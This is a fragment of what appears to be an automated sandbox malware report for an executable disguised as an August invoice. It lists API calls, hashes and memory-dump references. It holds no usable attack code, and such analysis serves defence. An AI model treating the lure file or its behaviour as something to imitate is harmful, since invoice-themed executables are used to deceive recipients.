                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy
                                                          • String ID: ^B$C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                          • API String ID: 1735881322-360563013
                                                          • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                          • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                          • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                          • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D